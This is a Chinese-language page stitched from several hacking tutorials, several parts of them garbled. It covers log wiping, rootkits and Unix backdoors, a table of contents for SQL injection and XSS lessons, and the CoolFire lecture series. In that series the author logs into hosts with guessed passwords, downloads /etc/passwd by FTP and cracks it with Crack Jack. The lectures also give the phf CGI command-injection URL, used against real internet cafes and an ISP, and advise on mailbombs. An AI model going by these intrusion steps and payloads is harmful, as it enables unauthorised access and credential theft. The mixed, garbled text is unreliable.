Unix体系而言),包含日记文件,所以一般黑客想要隐蔽本身的踪影的话,就会对日记进行修正.最简略的办法当然就是删除日记文件了,但如许做固然防止了体系治理员依据IP追踪到本身,但也明白无误地告知了治理员,体系己经被人侵了.所以最经常应用的办法是只对日记文件中有关本身的那一部分做修正.关于修正办法的具体细节依据不合的操纵体系有所差别,收集上有很多此类功效的程序,例如 zap. wipe等,其重要做法就是消除 stlog和 Pacct等日记文件中某一用户的信息,使得当应用st等敕令检讨日记文件时,隐蔽失落此用户的信息.治理员想要防止日记体系被黑客修正,应当采纳必定的措施,例如用打印机及时记载收集日记信息.但如许做也有弊病,黑客一旦懂得到你的做法就会不断地向日记里写入无用的信息,使得打印机不断地打印日记,直到所有的纸用光为止.所以比较好的防止日记被修正的办法是把所有日记文件发送到一台比较安然的主机上,即应用loghost.即使是如许也不克不及完整防止日记被修正的可能性,因为黑客既然能攻入这台主机,也很可能攻入loghost.只修正日记是不敷的,因为百密必有一漏,即使自以为修正了所有的日记,仍然会留下一些蛛丝马迹的.例如装配了某些后门程序,运行后也可能被治理员发明.所以,黑客高手可以经由过程调换一些体系程序的办法来进一步隐蔽踪影.这种用来调换正常体系程序的黑客程序叫做rootkit,这类程序在一些黑客网站可以找到,比较罕有的有LinuxRootKit,如今已经成长到了5.0版本了.它可以调换体系的stat.inetd等等一系列重要的体系程序,当调换了ls后,就可以隐蔽指定的文件,使得治理员在应用ls敕令时无法看到这些文件,从而达到隐蔽本身的目标.3.后门一般黑客都邑在攻入体系后不只一次地进入该体系.为了下次再进入体系时便利一点,黑客会留下一个后门,特洛伊木马就是后门的最好典范.Unix中留后门的办法有很多种,下面介绍几种罕有的后门,供收集治理员参考防备.<1>暗码破解后门这是入侵者应用的最早也是最老的办法,它不但可以获得对Unix机械的拜访,并且可以经由过程破解暗码制作后门.这就是破解口令单薄的帐号.今后即使治理员封了入侵者的当前帐号,这些新的帐号仍然可能是从新侵入的后门.多半情形下,入侵者查找口令单薄的未应用帐号,然后将口令改的难些.当治理员查找口令单薄的帐号是,也不会发明这些暗码已修正的帐号.因而治理员很难肯定查封哪个帐号.<2>Rhosts + + 后门在连网的Unix机械中,象Rsh和Rlogin如许的办事是基于rhosts文件里的主机名应用简单的认证办法.用户可以随便马虎的转变设置而不需口令就能进入. 入侵者只要向可以拜访的某用户的rhosts文件中输入"+ +",就可以许可任何人从任何地方无须口令便能进入这个帐号.特殊当home目次经由过程NFS向外共享时,入侵者更热中于此.这些帐号也成了入侵者再次侵入的后门.很多人更爱好应用Rsh,因为它平日缺乏日记才能. 很多治理员经常检讨 "+ +",所以入侵者现实上多设置来自网上的另一个帐号的主机名和用户名,从而不轻易被发明.<3>校验和及时光戳后门早期,很多入侵者用本身的trojan程序替代二进制文件.体系治理员便依附时光戳和系统校验和的程序分辩一个二进制文件是否已被转变,如Unix里的sum程序.入侵者又成长了使trojan文件和原文件时光戳同步的新技巧.它是如许实现的: 先将体系时钟拨回到原文件时光,然后调剂trojan文件的时光为体系时光.一旦二进制trojan文件与本来的准确同步,就可以把体系时光设回当前时光.Sum程序是基于CRC校验,很轻易骗过.入侵者设计出了可以将trojan的校验和调剂到原文件的校验和的程序.MD5是被大多半人推举的,MD5应用的算法今朝还没人能骗过.。
从零开始学习黑客技术入门教程(基础)
从零开始学习黑客技术入门教程〔根底〕最简单的黑客入门教程目录1 2 3 4 5黑客简介 .................................................................. .. (2)保护自己电脑绝对不做黑客肉鸡 .................................................................. ......................... 2 抓肉鸡的几种方法 .................................................................. ................................................. 5 防止黑客通过Explorer侵入系统 .................................................................. ......................... 9 SQL注入详解 .................................................................. ...................................................... 10 5.1 注入工具 .................................................................. ................................................... 11 5.2 php+Mysql 注入的误区 .................................................................. ........................... 11 5.3 简单的例子 .................................................................. ............................................... 12 5.4 语句构造 .................................................................. ................................................... 14 5.5 高级应用 .................................................................. ................................................... 22 5.6 实........................................................... 26 5.7 注入的防范 .................................................................. ............................................... 29 5.8 我看暴库漏洞原理及规律1 ................................................................... ................... 29 5.9 我看暴库漏洞原理及规律2 ................................................................... ................... 32 跨站脚本攻击 .................................................................. ....................................................... 34 6.1 跨站脚本工具 .................................................................. ........................................... 34 6.2 什么是XSS攻击 .................................................................. ..................................... 35 6.3 如何寻找XSS漏洞 .................................................................. ................................. 35 6.4 寻找跨站漏洞 .................................................................. ........................................... 36 6.5 如何利用 .................................................................. ................................................... 36 6.6 XSS与其它技术的结合 .................................................................. .......................... 37 XPath注入 .................................................................. ............................................................ 38 7.1 XPath注入介........................................ 38 7.2 XPath注入工具 .................................................................. . (41)67声明:文章来源大多是网上收集而来,版权归其原作者所有。
黑客基础教学.doc2
【黑客基础教学】教你们怎么从菜鸟级别到电脑高手一,巧解任何电脑的开机密码小小一招巧解任何电脑的开机密码,无需任何工具,无需放电,任何电脑当开机需要密码时,只需将机箱打开,把里面的声卡或其它任何一个零件拔下来,然后通电启动,主板自检后再强行关机,把拔下的零件再插上去,开机,密码自动清除,百试百灵。
二,让你的键盘会说话长期面对无声的电脑,我们难免疲倦。
如果正在输入的内容被系统一字(字母)不差地念出来,你还能在无声的疲倦中输入错误的内容吗?以Windows 2000/XP中一个鲜为人知的“讲述人”为例教你DIY一个完全免费的语音键盘。
在“运行”中输入“narrator”,点“确定”。
点“确定”跳过后便请出本文的主角──“讲述人”。
如果你的音箱已经打开,听到了什么?不想听的话就按一下Ctrl 键。
再按任意键试试,你输入的字母键被系统用标准的美国英语读了出来,这时一个完全免费的语音键盘就诞生在你的手中了。
三,快速关闭没有响应的程序“开始→运行”,输入“Regedit”,打开“注册表编辑器”,在HKEY-CURRENT-USER下新建串值Waittokillapptimeout,将其键值设为1000(ms)或更小。
允许强行关机进入HEKY-USERS.DEFAULTControl Paneldesktop,创建一个字符串“AutoEndTask”,将其键值设为“1”即可。
对于真正的死机,一般只能两次按下“Ctrl+Alt+Del”组合键或按主机箱上的“Reset”键(因为消耗资源较少,故前者优先)来重新启动了。
系统死机时自动重新启动进入HKEY_LOCAL_MACHINESystemCurre ntControlSetC-o-n-trolCrashControl主键,在右边的窗口中修改“AutoReboot”,将其的键值改为“1”。
四,ESC键不太为人知的几个妙用对于一般用户而言,位于键盘左上方的ESC键并不常用,但你知道吗?其实借助ESC键还能实现不少快捷操作哦!1.上网时,如果点错了某个网址,直接按ESC键即可停止打开当前网页。
coolfire黑客入门教程系列
CoolFire系列讲座第1讲作者:CoolFire [coolfires@] (2001-10-12 15:00:00) CoolHC Volume 1 By CoolFire Author E-Mail: coolfires@这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责!!#1 甚么是Hacking ?就是入侵电脑! 有甚么好解释的! 大部份有关介绍Hacker 的书籍或小说及文件等都有清楚的介绍, 沉迷於电脑的人... 破坏... 唉! 一大堆怪解释就是了, 最好不要成为一个"骇客", 我... 不是!#2 为甚么要Hack ?我们只是为了要解更多关於系统的技术, 入侵它,了解它是如何运作的, 试试它的安全性, 然後学著去使用它, 读取系统中有关操作的说明, 学习它的各项操作!! 为了安全性而作革命!#3 Hack 守则1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦.恶意破坏它人的软体将导致法律刑责, 如果你只是使用电脑, 那仅为非法使用!! 注意: 千万不要破坏别人的软体或资料!!2. 不修改任何的系统档, 如果你是为了要进入系统而修改它, 请在答到目的後将它改回原状.3. 不要轻易的将你要Hack 的站台告诉你不信任的朋友.4. 不要在bbs 上谈论你Hack 的任何事情.5. 在Post 文章的时候不要使用真名.6. 正在入侵的时候, 不要随意离开你的电脑.7. 不要侵入或破坏政府机关的主机.8. 不在电话中谈论你Hack 的任何事情.9. 将你的笔记放在安全的地方.10. 想要成为Hacker 就要真正的Hacking, 读遍所有有关系统安全或系统漏洞的文件(英文快点学好)!11. 已侵入电脑中的帐号不得清除或修改.12. 不得修改系统档案, 如果为了隐藏自己的侵入而作的修改则不在此限, 但仍须维持原来系统的安全性, 不得因得到系统的控制权而将门户大开!!13. 不将你已破解的帐号分享与你的朋友.#4 破解之道1. 进入主机中2. 得到/etc/passwd3. 得到系统帐号4. 得到最高权限-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- How 1.进入主机有好几种方式, 可以经由Telnet (Port 23) 或SendMail (Port 25)或FTP 或WWW (Port 80) 的方式进入, 一台主机虽然只有一个位址, 但是它可能同时进行多项服务, 所以如果你只是要"进入" 该主机, 这些Port 都是很好的进行方向. 当然还有很多Port, 但是DayTime 的Port 你能拿它作甚么??? 我不知道, 你知道吗?!底下的示范并不是像写出来的那么容易, 只不过是要让你解如何进入, 当然其中还有很多问题, 如打错指令...... 等等的毛病... 没有出现在课堂上, 但是我为了面子.... 一定要删掉这些不堪入目的东西嘛...示范进入主机的方法: (By CoolFire)(首先要先连上某一台你已经有帐号的Telnet 主机, 当然最好是假的, 也就是Crack过的主机, 然後利用它来Crack 别的主机, 才不会被别人以逆流法查出你的所在)Digital UNIX () (ttypa)login: FakeNamePassword:Last login: Mon Dec 2 03:24:00 from 255.255.0.0(我用的是 ... 当然是假的罗, 都已经经过修改了啦!!没有这一台主机啦!! 别怕! 别怕! 以下的主机名称都是假的名称, 请同学们要记得!!)Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996Digital UNIX V1.2C Worksystem Software (Rev. 248)Digital UNIX Chinese Support V1.2C (rev. 3)(嗯... 进来了! 开始攻击吧! 本次的目标是......)> telnet (Telnet 试试看....)Trying 111.222.255.255...Connected to .Escape character is '^]'.Password:Login incorrect(没关系, 再来!!)cool login: hinetPassword:Login incorrectcool login:(都没猜对, 这边用的是猜的方法, 今天运气好像不好)telnet> closeConnection closed.(重来, 换个Port 试试看!!)> telnet 111.222.255.255 80Trying 111.222.255.255...Connected to 111.222.255.255.Escape character is '^]'.<HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY><H1>Error 400</H1>Invalid request "" (unknown method)<P><HR><ADDRESS><A HREF="">CERN-HTTPD 3.0A</A></ADDRESS></BODY></HTML>Connection closed by foreign host.(哇哩!! 连密码都没得输入, 真是..... 再来!! 要有恒心!!)(换FTP Port 试试)> ftp 111.222.255.255Connected to 111.222.255.255.220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.Name (111.222.255.255:FakeName): anonymous331 Guest login ok, send your complete e-mail address as password.Password:230-Welcome, archive user! This is an experimental FTP server. If have any 230-unusual problems, please report them via e-mail to root@230-If you do have problems, please try using a dash (-) as the first character230-of your password -- this will turn off the continuation messages that may230-be confusing your ftp client.230-230 Guest login ok, access restrictions apply.Remote system type is UNIX.Using binary mode to transfer files.(哇! 可以用anonymous 进来耶!! password 部份输入aaa@ 就好了! 不要留下足迹喔!!)ftp> ls200 PORT command successful.150 Opening ASCII mode data connection for file list.etcpubusrbinlibincomingwelcome.msg226 Transfer complete.(嗯嗯... 太好了! 进来了!! 下一个目标是.....)ftp> cd etc250 CWD command successful.ftp> get passwd (抓回来!!)200 PORT command successful.150 Opening BINARY mode data connection for passwd (566 bytes).226 Transfer complete.566 bytes received in 0.56 seconds (0.93 Kbytes/s)(喔... 这么容易吗??)ftp> !cat passwd (看看!!!)root::0:0:root:/root:/bin/bashbin:*:1:1:bin:/bin:daemon:*:2:2:daemon:/sbin:adm:*:3:4:adm:/var/adm:lp:*:4:7:lp:/var/spool/lpd:sync:*:5:0:sync:/sbin:/bin/syncshutdown:*:6:0:shutdown:/sbin:/sbin/shutdownhalt:*:7:0:halt:/sbin:/sbin/haltmail:*:8:12:mail:/var/spool/mail:news:*:9:13:news:/var/spool/news:uucp:*:10:14:uucp:/var/spool/uucp:operator:*:11:0:operator:/root:/bin/bashgames:*:12:100:games:/usr/games:man:*:13:15:man:/usr/man:postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bashftp:*:404:1::/home/ftp:/bin/bash(哇哩... 是Shadow 的... 真是出师不利.... )ftp> bye221 Goodbye.(不信邪.... 还是老话, 要有恒心....)(FTP 不行, 再Telnet 看看!!)> telnet Trying 111.222.255.255...Connected to .Escape character is '^]'.Password:Login incorrect(又猜错!!)cool login: fuckyouPassword:Last login: Mon Dec 2 09:20:07 from 205.11.122.12Linux 1.2.13.Some programming languages manage to absorb change but withstand progress.cool:~$(哇哈哈!! 哪个笨root, 用system name 作username 连password 也是system name.... 总算... 没白玩...)cool:~$ systembash: system: command not found(嗯... 这个user 的权限好像不大....)cool:~$ lscool:~$ pwd/home/fuckyoucool:~$ cd /cool:/$ lsPublic/ cdrom/ lib/ mnt/ tmp/ www/README dev/ linux* proc/ usr/bin/ etc/ local/ root/ var/boot/ home/ lost+found/ sbin/cool:/$ cd etctelnet> quit(好想睡呀!! 不玩了!! 下节课再开始....)Connection closed.> exit(走了!! 下节课在见啦!! 今天就上到这里! 老师要先下班了!!)(有学生说: 骗人! 还没有破解呀!! 胡说! 不是已经进来了吗???看看这节课上的是甚么??? ---->进入主机!! 嗯.....)-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- How 2.上节课抓回来一个"乱七八糟" 的/etc/passwd, 你以为我的真那么笨吗?? guest 所抓回来的能是甚么好东西?? 所以这一节课继续上次的攻击行动. 上节课我们已经"猜" 到了一个不是guest 的username 及password. 今天就以它来进入主机瞧瞧!!Digital UNIX () (ttypa)login: FakeNamePassword:Last login: Mon Dec 2 03:24:00 from 255.255.0.0Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996Digital UNIX V1.2C Worksystem Software (Rev. 248)Digital UNIX Chinese Support V1.2C (rev. 3)(嗯... 进来了! 开始攻击吧! 本次的目标是.....呵...)> telnet (Telnet 试试看.... 昨天的位址, 有作笔记吧!)> telnet Trying 111.222.255.255...Connected to .Escape character is '^]'.Password:Login incorrectcool login: fuckyouPassword: (一样输入fuckyou)Last login: Mon Dec 1 12:44:10 from Linux 1.2.13.cool:~$ cd /etccool:/etc$ lsDIR_COLORS ftpusers localtime resolv.conf HOSTNAME gateways magic rpc NETWORKING group mail.rc securetty NNTP_INEWS_DOMAIN host.conf motd sendmail.cfX11@ hosts messages/ sendmail.stXF86Config hosts.allow mtab servicesat.deny hosts.deny mtools shells bootptab hosts.equiv named.boot shutdownp csh.cshrc hosts.lpd networks snoopy/ csh.login httpd.conf nntpserver slip.hosts exports inetd.conf passwd snooptab fastboot inittab passwd.OLD syslog.conf fdprm issue passwd.old syslog.pid fstab ld.so.cache printcap ttys ftpaccess ld.so.conf profile utmp@(找寻目标..... 太乱了! 懒得找, 再来....)cool:/etc$ ls pa*passwd passwd.OLD passwd.old(果然在)cool:/etc$ more passwd(看看有没有Shadow...)root:acqQkJ2LoYp:0:0:root:/root:/bin/bashjohn:234ab56:9999:13:John Smith:/home/john:/bin/john(正点! 一点都没有防备!!)cool:/etc$ exitlogout(走了!.... 换FTP 上场!!)Connection closed by foreign host.> ftp Connected to .220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.Name (:66126): fuckyou331 Password required for fuckyou.Password:230 User fuckyou logged in.Remote system type is UNIX.Using binary mode to transfer files.ftp> cd /etc250 CWD command successful.ftp> get passwd200 PORT command successful.150 Opening BINARY mode data connection for passwd (350 bytes).226 Transfer complete.350 bytes received in 0.68 seconds (1.9 Kbytes/s)ftp> !cat passwdroot:acqQkJ2LoYp:0:0:root:/root:/bin/bashjohn:234ab56:9999:13:John Smith:/home/john:/bin/john(看看! 呵! 假不了!!......)ftp> bye221 Goodbye.> exit(闪人罗!! 下课!!.... 喔慢点, 还有事要说明......)passwd 的Shadow 就是把passwd 放在shadow 档中, 而你原先在第一节课所看到的这个格式的passwd 并不是真正的passwd....root::0:0:root:/root:/bin/bash因为密码的部份没有东西.... 所以拿了也没有用!! 但这一节课所拿到的东西呢, 像是这样, 有几点需要说明的, 就是它究竟代表著甚么???john:234ab56:9999:13:John Smith:/home/john:/bin/sh它以":" 分成几个栏位, 各栏位对照如下:User Name: johnPassword:234ab56User No: 9999Group No: 13Real Name: John SmithHome Dir: /home/johnShell: /bin/sh了吧! 了吧! 保留著你千辛万苦所拿到的passwd, 咱们第三节课再来告诉各位如何使用Crack Jack 把passwd 解码.... 呵呵... zzZZzZzz...-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-Crack Jack V1.4 中文使用说明(By CoolFire 12-1-1996)嗯... 该到第三课了!! 累了的同学先去喝口水吧!这一节课咱们来说说Crack Jack ! 这可是个解读/etc/passwd 的好工具喔, 不要告诉我你习惯用Brute, 拿Brute 跟Crack Jack 的速度比比看, 包准你马上投向Crack Jack 1.4 的怀抱, 但请先确定你所使用的是Crack Jack 1.4, 你可以在CoolFire 的Hacker&Mailer Page 中拿到这个版本的Crack Jack ! 这才是真正有用的版本, 速度... 对... 就是这点别人都比不上! 但还是要讲讲它的缺点... 就是只能在DOS 跟OS2 中跑, 如果在Windoz 95 上开个DOS Mode 跑, 它可是连理都不会理你的!OK! 现在切入正题! etc/passwd 拿到手了吧!! 开始罗!! 使用Crack Jack 1.4 前所需要的东西有这些[1] Crack Jack 1.4 (废话...$%^&@@) [2] /etc/passwd 档案, 你可以在Unix 系统中的/etc/ 目录中找到passwd [3] 字典档(哪里找, 自己敲... 呵ClayMore 中有一份DIC.TXT是有一千多个字的字典, 但比起我的字典可就小巫见大巫了, LetMeIn! 1.0 里面也有, 听James说 2.0 Release 的时候会有更棒的字典档含入, 期待吧!).... 使用Crack Jack 1.4 前需先确定你所使用的机器是386 含以上CPU 的! 然後最好有充足的记忆体!!开始Jack 时只要敲入JACK 即可, 它会问你PW Name... 输入你的passwd 档名, DictionaryName 输入你的字典档名, Jack 就会开始找了! 找到时会告诉你, 也会在JACK.POT 中写入它所找到的密码!! 但... 有点怪的格式! 如果找到的是具root 权限的密码, Jack 会告诉你This isJackAss... 嗯...说脏话了!! 因为使用Jack 占用的时间实在太多, 如果你中途想要停掉时只要按下Ctrl-C 即可, 别以为你前功尽弃了! 因为Jack 有个Restore 的功能, 中断时会自动存档为RESTORE, 下次要继续这次的寻找只要输入Jack -Restore:RESTORE 即可!! 当然你也可以为你的Restore 重新命名! Jack 也会找得到的... 如Ren restore restore.HNT 之後要再寻找的时後就Jack -Restore:RESTORE.HNT 即可... Jack 会很自动的Restore 前次所寻找的字串...继续帮你找下去....字典档哪里找: 我的不给你! 可以找别的Brute Force 之类的程式, 有些里面会附, 或是找找其它的Hacker 地下站看看有没有, 自己编一个, 或找个英汉字典软体将字典的部份解出来, 可能要有一点资料栏位及写程式的基础.[这一节课没有范例] 成功的案例: 找到过某家网路咖啡店的root 权限密码! Jack 好正点呀!!!所花的时间: 20 分钟左右... 但也有找了一两天也找不到的..... 呜... 骇客们! 加油吧!!继续CoolFire系列讲座第2讲作者:CoolFire [coolfires@] (2001-10-12 15:00:00) CoolHC Volume 1By CoolFire Author E-Mail: coolfires@这不是一个教学文件, 只是告诉你该如何破解系统,好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责!!话说上次CoolFire 讲到许多的Net Coffee 店, 安全性之差实在是没话说,但是过了这麽久也不见有几家改进, 可能是想让自己的电脑被别人玩弄在股掌之间吧, 但可不是每个人都像CoolFire这样温和, 如果遇到的是比较狠一点的角色, 那你的Net Coffee 可能要有一两天只卖Coffee 而没办法再Net 下去了!!继CoolHC#1 推出後, 有许多人是否已经跃跃愈试了呢?? 这次咱们不谈新的花招,用用之前所讲的再来探险一番, 当然, 这一次我照往例还是不会使用真正的Domain Name 来作教学,但是课程中的所有内容绝对属实, 当然本次攻击的对象还是.... Net Coffee Shop....**谈一下Crack Jack 猜猜密码许多人从上一次介绍Crack Jack 之後就应该已经领教过它的功力了,但是有几点需要说明的,有些人使用Jack 来帮你寻找password, 我就当你已经抓到了没有shadow 的/etc/passwd,但是为甚麽使用Jack 还是找不到呢?? 我想你应该要换个正点一点的字典档了, 因为Jack 还是根据你所提供的字典档在寻找, 如果你提供的字典本身就没有这些字,那当然连一个小小帐号的密码你都别想猜到了. 数一下你所使用的字典档中有多少字???我用的字典档有十九万多个字, 你的呢? 是不是小巫见大巫呀?? 那麽就赶快充实一下字典档再重新寻找吧!!许多人的密码都有一定的法则, 我自己写了PaSs2DiC 就是将UserName 由passwd档转成字典档的工具, 这是对一些喜欢使用UserName 当作Password 的人最好的方式,但是也曾经好运的找到别人的密码, 真不晓得"甲"是不是暗恋"乙"才用"乙"的ID 作为密码的???你可以很简单的使用Qbasic 来制作"序数" 密码, 或日期密码, 底下简单的作一个0101 (一月一日) 到1231 的密码档出来:------------Cut Here MakeDate.BAS -------------------Open "Dates" for output as #1for I=1 to 12for J=1 to 31I1$=rtrim$(ltrim$str$(I)))J1$=rtrim$(ltrim$str$(J)))if len(I1$)=1 then I1$="0"+I1$if len(J1$)=1 then J1$="0"+J1$Out$=I1$Content$J1$print #1,Out$next Inext Jclose------------ Cut Here End MakeDate.BAS ----------------这支小程式将会写一个"DATES" 的档案, 里面就是你要的字典, 当然啦,这只是包含月跟日!!如果你要猜的密码是含年份的, 你可能要再增加一些程式码, 再Run 一次试试看了,不过这是一个好的开始不是吗??**如何保护自己的密码谈了这麽多的密码猜法, 当然要谈一下如何保护自己的密码不被破解,请遵守以下的原则: [1]不用生日作为密码(太容易猜了啦) [2]不用序数作为密码(除非你的序数无限大) [3]不用身份证字号作为密码(LetMeIn! 里有猜身份证字号的功能耶)[4]不用在字典中查得到的字作为密码.那麽依照上面的几点说法, 甚麽样子的密码最不容易猜, 自己也最好记呢?? 答案是:用一句有意义的话来作为自己的密码, 例如: NoOneCanCrackIt 就是一个很难猜的密码类型, 基於这个密码猜法的原则, 你的密码是不是要作些更新, 或是大小写要作一些对调?? 如果你的密码是coolfire,建议你最好能改成CoolFire 或coolfires (加复数"s"),这样被猜中的机率就小了很多. 如果你是一个Hacker, 你的密码也被人猜中的话... 那...#%%^^^&@**正式的话题这次的话题当然还是Crack, 相信许多人已经看过CoolHC#1 了,当然眼尖的人可能也已经D/LSystem Holes 试过了, 你有成功的例子吗?? 如果没有, 这份CoolHC#2可能就是你的强心针,因为这次谈的正是System Holes #1 成功的案例.Step 1. 连线到"蕃薯藤" 找"网路咖啡" 找到好多家网路咖啡的WWW 网址, 一一连上去试试看在System Holes #1 中的方法可不可行.Step 2. 若可行则会传回/etc/passwd 资讯, 存档後迅速Logout, 使用Crack Jack解读!![[实例探讨]]System Holes #1 中所介绍的WWW 入侵法是这样子的:/cgi-bin/nph-test-cgi?* 後再/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd[1] 用WWW Browser 连到[2] Location 输入--> "/cgi-bin/nph-test-cgi?*"[3] 接著如果出来一份像Report 的画面的话, 接著输入/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd[4] 发生了甚麽事?? etc/passwd 在你的浏览器中"显示" 出来了!! 快点Save 吧!!这个方法所用的是系统"检索" 的漏洞, 不提供这个功能,或是伺服器检索类型不同的机器则不会接受这样的指令, 当然也就逃过我们这次的模拟演练啦!! 但是.... 相信我,你一定会找到一家脱线的网路咖啡, 并没有像我们一样每天阅读Mail List 的信,对系统安全一点研究也没有的人不在少数. 就是这样的一个Net Coffee Shop... 呵.... 快来试试吧!!当CoolFire 抓到/etc/passwd 後, 立刻存档, 也马上断线, 并且拿出UltraEdit 来瞧一下使用者的资讯, 当然这个小passwd 对Crack Jack 来说, 实在是不够看,没几分钟就在我的486 机器上显示出来几个以UserName 作为Password 的资讯(归功於PaSs2DiC 及CrackJack 的功劳)不过当我试著找寻root 的密码时, 一想到我那将近20 万字的字典档,就想到可能花费的时间一定相当的惊人, 於是就以Jack 的Option 设定只寻找root 那一行, ...(过了良久)... 果不然又是一个笨root. 用了"非常" 容易猜的密码... <--- This is JackAss... 呵!! GotIt!如果你所使用的机器速度不是顶快, 你最好能够到快一点的机器上使用Crack Jack,不然你也可以将字典档切割成几个小档案, 然後再分别在几台机器上跑, 我目前使用的配备是486DX4-13032MB RAM, 3.2GB HDD, 近20 万字的字典档, 如果在分析较大的passwd档时我会将字典档切割为四至五个小档(看有多少台机器可跑),然後在周末下班前在公司的几台机器上分别执行CrackJack, 等到礼拜一上班时就等著接收成果了! 当然如果你只有一台机器, passwd 档又很大的话,由於Crack Jack 无法於Windoz 95 下使用, 你可能只能牺升时间或机器来跑了! 再没有办法的话, 亦可使用单机多工, 多开几个DOS Box 来跑Brute, 也许也是一个可行的办法!**後语有许多人在使用Crack Jack 的时候有许多问题, 不过看了CoolHC#1 应该都解决了吧?? 最近大家问的比较多的是UpYours 3.0, 虽然已经改进了Install 的问题,不过大家的问题还是都出在Winsck.ocx 上面, 有人说装了MSICP Beta 会好?? 但也有实例装了也还不能Run 的,在此建议大家不要再玩MailBomb 了, 虽然我喜欢收集这种东西, 但还是少乱炸为妙,已经证实有许多常用的MailBomb 没有办法Fake IP 了!! 所以... 如果UpYours 3.0装不起来的人就试试KaBoom!V3.0 吧! 虽然没有办法Fake IP (选错Mail Server 的话), 但是也是一个不错的AnonyMailer如果要发匿名信, 现在首页上有可以帮你发信的Mailer, 会安全一点.如果你仍旧对UpYours 3.0 不死心, 就试试ResSvr32.exe (Under Windows/systemdirectory),看看能不能将WinSck.ocx 装上了... 记得先UnReg 再Reg...在此建议大家可以多订阅一些"系统安全" 讨论的Mail List或多参考一些已经被找出来的系统漏洞, 因为有些人对这些方面并不是很重视, 所以这些资讯也就显得格外的重要了,如果能够多参考一些资讯, 在你入侵的时候会有很大的帮助, 当然, 如果你能作出一份列表出来,放在手边参考的话, 就可以快速的; 安全的入侵了!! 下一次所谈的是SendMail 的Bug 实例,在这中间当然照往例会先出一份System Holes #2 来作为资料. 如果有兴趣的人在SH#2 出来的时候可以先研究看看. 下次见! Merry X'Mas..... & Happy New Year.......------上次讲的Home Page 建置案还没搞完, 没有充实一下Home Page 实在是对不起大家,所以利用一点时间写了CoolHC#2, 可能报告又交不出来了!! 老话,如果你有兴趣写其它程式的中文说明, 请完成後寄一份给我, 我将它放在Home Page 上面让其它人参考,当然你也可以给我你的使用心得, 让别人参考看看也行! 目前准备收集一系列的System Hole List,如果你在其它的站台有看到的, 请把它先Cut 下来, Mail 一份给我!------再次重申, Crack 别人站台之後不要破坏别人站台中的资料, 此篇文章仅作为教育目的,不主张你随便入侵他人主机.... (高-Net 还是除外)... 请勿将这类技术使用於破坏上(又...如果第三次世界大战开打, 你可以任意破坏敌国的电脑网路... 我全力支持),最严重的情况(如果你真的很讨厌该主机的话)... 就将它Shut Down.... 好了! 别太暴力了!CoolFire系列讲座第3讲:如何连接ISP并且对其解码作者:CoolFire [coolfires@] (2001-10-13 08:05:00) CoolHC Volume 3 By CoolFire Author E-Mail: coolfires@这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责!!前几次说到了Net Coffee 店, 还好他们没有提供客户拨接上线的功能, 不然密码或是帐号被人盗用的客户不就糗大了! 但是CoolFire 在这两周的探险中, 为了找一个酷似网路咖啡站台的W3 密码,误入一个号称第一个提供网路拨接的ISP, 且在CoolFire 顺利的抓回/etc/passwd 之後, 使用了自己写的PaSs2DiC + CJack 来解出密码, 没想到不用 1 分钟, 就找出了9 组ID 与Password 相同的密码,勿怪我没有在这里提醒大家, 还好我没有找到root password, 不然可能该系统就此停摆, 不可再见天日也! (当然我不可能这么作啦!).看看最近兴起的网路咖啡及各大网站的系统安全设施, 再加上CoolFire 最近开会的时候遇到的情况, 不难发现我们的国家正往高科技的领域快步迈进, 但是这些系统的安全性若不加强, 可能到时候人家只要一台电脑再加上一台数据机就可以让整个国家的金融及工商业崩溃! 大家要小心呀!ISP 是一般User 拨接的源头, 技术上理应比较强, 但还是轻易让人入侵, 且又没有教导User 正确的网路使用观念(Password 的设定及proxy 的使用等), 实在不敢想像这样的网路发展到几年後会是甚么样子??这一次的说明还是没有谈到新的技巧, 在James 将首页更新後各位应该已经可以从中学到许多东西了, 如果想要学习入侵, 就一定要知道最新的资讯(入侵本国的网路则不用, 反正没人重视网路安全..... 真失望), 在别人还没将Bug 修正之前就抢先一步拿到/etc/passwd, 所以订阅一些网路安全的Mail List 是必要的, 多看一些网安有关的News Group 也是必要的(不仅Hacker 如此, ISP 更要多注意这些资讯!). 日後有空再整里一些Mail List 给大家!!本次主题: 说明如何连接该ISP 并且对其/etc/passwd 解码连接位址: (203.66.169.11)特别说明: 由於本次主题说明重点使用真实的位址及名称, 所以CoolFire 已经Mail 给该网页之维护人员更改密码, 但该网页之ISP 仍为新手之练习好题材! CoolFire Mail 给该网页维护人员之信件内容如下, 如果他还不尽快改掉, 我也没办法了!Mail sent to dhacme@:Subject: 请速更动网页密码From: CoolFire <coolfires@>你的网页作得不错, 但是因为你所设定的密码太容易为骇客所? 入侵, 请於见到此信後速速更改你的网页进入密码, 否则下次若网页遭到篡改, 本人概不负责!!**** 课程开始****请注意: 